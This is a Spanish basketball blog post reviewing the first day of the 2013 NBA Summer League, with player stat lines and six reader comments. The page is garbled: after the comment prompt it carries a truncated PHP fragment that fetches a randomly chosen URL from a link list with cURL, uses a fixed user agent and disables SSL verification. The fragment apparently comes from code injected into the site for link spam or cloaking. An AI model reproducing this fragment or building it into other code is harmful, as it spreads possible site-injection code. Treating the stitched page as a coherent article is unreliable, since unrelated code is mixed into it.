Summer Leagues: Día 1

08 de July de 2013 por rumbero

Una vez has recogido tus melones del huerto llega el momento de catarlos. Las ligas de verano es la primera toma de contacto de los rookies con algunos de sus futuros compañeros y la primera vez que tienen que aguantar los gritos de sus entrenadores de la NBA. Iremos repasando lo que dan de sí fijándonos en las actuaciones individuales de los jugadores.

Destacados

Terrence Jones: Es darle minutos y demostrar la buena pinta que tiene. 24 puntos (9/13 FG), 12 rebotes y 5 pérdidas de regalo. Está para cosas mayores que la SL pero viendo las intenciones de los Rockets para esta temporada va a necesitar de muchos partidos así para hacerse un hueco.

Michael Carter-Williams: Cerca del cuádruple doble. 26 puntos en un 8/23 FG y 0/6 3P que confirman que no tiene la mejor de las muñecas. Además de tirárselo casi todo por parte de los Sixers le dio tiempo a dar 8 asistencias, coger 7 rebotes y perder 9 balones mientras que robó solo uno. Va a estar divertido verlo

Kelly Olynyk: Demostrando en 25 minutos las buenas maneras que tiene en ataque. 25 puntos, 7 rebotes y enchufando un par de triples. En defensa ya es otra cosa. Le faltan kilos y mejorar ese desplazamiento lateral pero parece que al menos le echa ganas

Victor Oladipo: Había ganas de ver al pick 2 de Orlando. 18 puntos, 6 rebotes, 7 asistencias, 5 robos y 6 pérdidas. Lo curioso es que le vimos jugando de PG que se supone no es su puesto. Habrá que estar atentos por si es un intento de combo guard o simplemente un experimento. A un servidor le gustaron las ganas y maneras de chaval y eso que no estaba en su sitio.

Andre Drummond: Al de los Pistons ya lo conocemos pero no está de más poner la animalada de partido (en todos los sentidos) que hizo. 12 puntos (5/14 FG, 2/9 TL), 16 rebotes, 5 robos,  6 tapones, 7 pérdidas. Todo en 25 minutos… Igual son los que va a tener con Josh Smith en el equipo.

Jason Kidd: Mucha intensidad, una técnica por salirse de la zona técnica a protestar y varias indicaciones a los suyos de pegarle palos a Drummond. No decepcionó en absoluto en su debut. 

A seguir

Plumlee Brothers:  10/17 para el de los Nets y 9/9 y 6 tapones para el de Indiana. Ya comentó Vogel que este último seguramente tendría más minutos esta temporada.

Jeremy Lamb: Visto que a los Thunder se se les ha ido Martin y de momento no han traído a nadie para reemplazarlo habrá que seguirlo. 14 puntos y 6 rebotes en media hora.

Romero Osby: Con este nombre de crack habrá que estar atentos. Casi impecable en el tiro (7/8 FG  y 4/5 FT) se fue a los 18 puntos 5 rebotes, 2 robos, 1 tapón y 1 pérdida. Se emparejó bastante con Olynyk eso sí y es cierto que se hicieron un roto mutuamente.

– Peyton Siva: Partido completo y muy serio del de los Pistons. 6 puntos, 4 rebotes, 6 asistencias, 4 robos y 1 pérdida.

– Patrick Beverley: Su último partido fue en PO y aquí lo tenemos… Hay que seguirlo no vaya a robarle más minutos de los que nos pensamos a Lin. 10 puntos, 4 rebotes, 6 asistencias y 2 robos.

Decepciones

– Trey Burke:  Otro al que había muchas ganas de ver. 8 puntos con 1/12 FG, 7 rebotes, 5 asistencias, 1 robo y 2 pérdidas. Bastante gris y lo peor es que fue ante unos Heat que porque lo llevaban escrito en la camiseta… Se espera mucho más de él

– Kentavious Caldwell-Pope:  0/8 en triples, 0 asistencias, 3 rebotes, 4 pérdidas y un póster de Plumlee. Partido para olvidar del rookie al que escogieron precisamente por delante de Burke.

Comenta

6 comentarios a esta entrada

  1. Esteban dice:
    #1

    wow que bestia drummond, no entiendo como detroit ficho a smith, esta bien quye tenian espacio y quizas lo usen como moneda de cambio, pero una dupla monroe/drummond puede ser epica, sobretodo en rebotes

    carter-williams ya esta en plan, nuevo jugador franquicia, no queda nadie en los 76ers que le haga sombra y lo sabe,

    importantisima liga de verano para jeremy lamb, si responde, el thunder se la jugara con el y reggie jackson para reemplazar lo que hacia martin, no es poca cosa

      Citar

  2. Esteban dice:
    #2

    quien diria dos años atras que el magic podria poner en una liga de verano a oladipo, nicholson, harkless, doron lamb y darse el gusto quye dejar afuera a tobias harris?

    no seran competitivos aun pero al menos tienen jovenes para competir

      Citar

  3. Ruxixón dice:
    #3

    ¿Quién era el mostrenco de Orlando que creo que jugó con el nº 2?Uno que tenía barba a lo Harden…no sé si era por la altura de la cámara pero menudo bicho….

      Citar

  4. Denise dice:
    #4

    Ruxixón: ¿Quién era el mostrenco de Orlando que creo que jugó con el nº 2?Uno que tenía barba a lo Harden…no sé si era por la altura de la cámara pero menudo bicho….

    Kyle O’quinn, tiene contrato en vigor con Orlando y se marcó un muy buen tramo final de temporada robandole muchos minutos a Nicholson y quedando por delante de él en la rotación.
    Si mal no recuerdo, fue la 2º ronda de Orlando el año pasado en un pick 40 y pico.

      Citar

  5. Ruxixón dice:
    #5

    Denise: Kyle O’quinn, tiene contrato en vigor con Orlando y se marcó un muy buen tramo final de temporada robandole muchos minutos a Nicholson y quedando por delante de él en la rotación.
    Si mal no recuerdo, fue la 2º ronda de Orlando el año pasado en un pick 40 y pico.

    Gracias Denise! Buena camada la de Orlando,este año seguiré mucho de sus encuentros que tiene pinta que a medio plazo darán que hablar.

      Citar

  6. Denise dice:
    #6

    Mierda, me he hecho un lio con los horarios, pensaba que el Orl-Oklahoma empezaba a las 7, y no se a que hora ha debido empezar que ha ha terminado. Ha ganado de 1 Oklahoma, y por los box-scores, no ha brillado nadie, por los Thunder Reggie Jackson 4 puntos y 7 perdidas, Lamb 4 de 16 en tiros…, el drafteado Adamas no ha jugado; y por los Magic, Oladipo y Osby muy mal (3 de 19 en tiros entre ambos) y lamentable el equipo en el apartado exterior.

    Para cuando empiece la liga, Orlando necesitaría urgentemente un base (ó escolta si traspasan a Afflalo) que sepa tirar de 3, porque de físico el equipo va sobrado pero de manita anda mal..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>